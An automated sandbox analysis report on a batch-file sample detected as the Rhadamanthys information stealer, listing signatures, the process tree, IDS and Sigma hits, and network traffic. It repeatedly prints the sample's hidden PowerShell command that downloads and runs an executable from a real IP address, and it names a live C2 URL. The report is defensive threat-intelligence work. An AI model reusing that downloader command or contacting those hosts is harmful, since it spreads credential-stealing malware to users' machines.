Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
098aPtSbmd.bat

Overview

General Information

Sample name:098aPtSbmd.bat
renamed because original name is a hash value
Original sample name:a739aa217d572cbcdace798a642d1b2c8bda9639aecd6ce95a8303a3de338dca.ps1.bat
Analysis ID:1568256
MD5:983ac59bfb78d05e83bef62c1f91516b
SHA1:0dfe2ca4dfb9fb83d550cbf2f0bbd7ae6f94d809
SHA256:a739aa217d572cbcdace798a642d1b2c8bda9639aecd6ce95a8303a3de338dca
Tags:95-169-201-100batuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6360 cmdline: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 2376 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
      • readme.exe (PID: 8000 cmdline: "C:\Users\user~1\AppData\Local\Temp\readme.exe" MD5: 1C0B92098975DC116DE9C0595D347882)
        • readme.exe (PID: 9148 cmdline: "C:\Users\user~1\AppData\Local\Temp\readme.exe" MD5: 1C0B92098975DC116DE9C0595D347882)
          • fontdrvhost.exe (PID: 9200 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
            • fontdrvhost.exe (PID: 2032 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
              • WerFault.exe (PID: 8648 cmdline: C:\Windows\system32\WerFault.exe -u -p 2032 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • WerFault.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 9148 -s 424 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user~1\AppData\Local\Temp\readme.pdf" MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7688 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6456 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7932 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6944 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8292 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7336 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8788 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=2432 --field-trial-handle=2028,i,6286919390183258401,11703614635842124425,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus"}
SourceRuleDescriptionAuthorStrings
00000018.00000003.1631623482.0000000004EB0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000018.00000002.1731697999.0000000002DC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000018.00000003.1625239698.00000000007F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000017.00000003.1618499894.0000000000A10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000017.00000002.1634336997.0000000000C70000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            24.3.fontdrvhost.exe.4eb0000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              23.3.readme.exe.3170000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                24.3.fontdrvhost.exe.50d0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  23.3.readme.exe.2f50000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    24.3.fontdrvhost.exe.4eb0000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 1 entries

                      System Summary

                      barindex
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\readme.exe, ProcessId: 8000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DiskTuner
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", ProcessId: 6360, ProcessName: powershell.exe
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", ProcessId: 6360, ProcessName: powershell.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", ProcessId: 6360, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf , CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\readme.pdf , ProcessId: 2376, ProcessName: msedge.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\098aPtSbmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe"", ProcessId: 6360, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7292, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:53:14.400478+010028032742Potentially Bad Traffic192.168.2.74970195.169.201.10018960TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:53:46.714591+010028548021Domain Observed Used for C2 Detected104.37.175.2327716192.168.2.749819TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://95.169.201.100:18960/uploads/team-1/readme.pdfAvira URL Cloud: Label: malware
                      Source: http://95.169.201.100:18960/uploads/team-1/readme.exeAvira URL Cloud: Label: malware
                      Source: 19.2.readme.exe.674fd2.1.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus"}
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeReversingLabs: Detection: 21%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\readme.pdfJump to behavior
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.177.22:443 -> 192.168.2.7:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.177.22:443 -> 192.168.2.7:49849 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.177.22:443 -> 192.168.2.7:49883 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49885 version: TLS 1.2
                      Source: Binary string: wkernel32.pdb source: readme.exe, 00000017.00000003.1622791871.0000000003070000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1622665787.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631257848.00000000031E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631370120.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: readme.exe, 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1623575797.0000000003170000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631623482.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: readme.exe, 00000017.00000003.1621086501.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621282382.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630157452.00000000050A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1629165044.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: readme.exe, 00000017.00000003.1622057721.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621817022.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630631073.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631008255.0000000005050000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: readme.exe, 00000017.00000003.1621086501.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621282382.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630157452.00000000050A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1629165044.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: readme.exe, 00000017.00000003.1622057721.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621817022.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630631073.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631008255.0000000005050000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: readme.exe, 00000017.00000003.1622791871.0000000003070000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1622665787.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631257848.00000000031E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631370120.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: readme.exe, 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1623575797.0000000003170000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631623482.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp28_2_00000205BFC30511

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.232:7716 -> 192.168.2.7:49819
                      Source: Malware configuration extractorURLs: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus
                      Source: global trafficTCP traffic: 95.169.201.100 ports 18960,0,1,6,8,9
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49701
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49701
                      Source: global trafficTCP traffic: 192.168.2.7:49701 -> 95.169.201.100:18960
                      Source: global trafficTCP traffic: 192.168.2.7:49819 -> 104.37.175.232:7716
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Length: 2764800Content-Type: application/octet-streamLast-Modified: Tue, 03 Dec 2024 09:35:15 GMTDate: Wed, 04 Dec 2024 12:53:14 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 8c c0 ee f9 ed ae bd f9 ed ae bd f9 ed ae bd 7a e5 f1 bd fe ed ae bd 03 ce b7 bd fb ed ae bd ea e5 f3 bd fb ed ae bd 7a e5 f3 bd ee ed ae bd f9 ed af bd 9b ec ae bd 23 ce b2 bd f8 ed ae bd fc e1 f1 bd f8 ed ae bd fc e1 ce bd 90 ec ae bd 15 e6 f0 bd f8 ed ae bd f9 ed ae bd f8 ed ae bd fc e1 f4 bd f8 ed ae bd 52 69 63 68 f9 ed ae bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ee d1 10 43 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 07 0a 00 c0 13 00 00 60 16 00 00 00 00 00 00 c3 0d 00 00 10 00 00 00 d0 13 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 36 00 00 10 00 00 59 10 24 00 02 00 00 04 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 2e 15 00 18 01 00 00 00 80 22 00 a0 fc 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 13 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$zz#RichPELC`@6Y$.".text
                      Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                      Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                      Source: Joe Sandbox ViewIP Address: 94.245.104.56 94.245.104.56
                      Source: Joe Sandbox ViewASN Name: GOBULNETBG GOBULNETBG
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 95.169.201.100:18960
                      Source: global trafficHTTP traffic detected: GET /work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
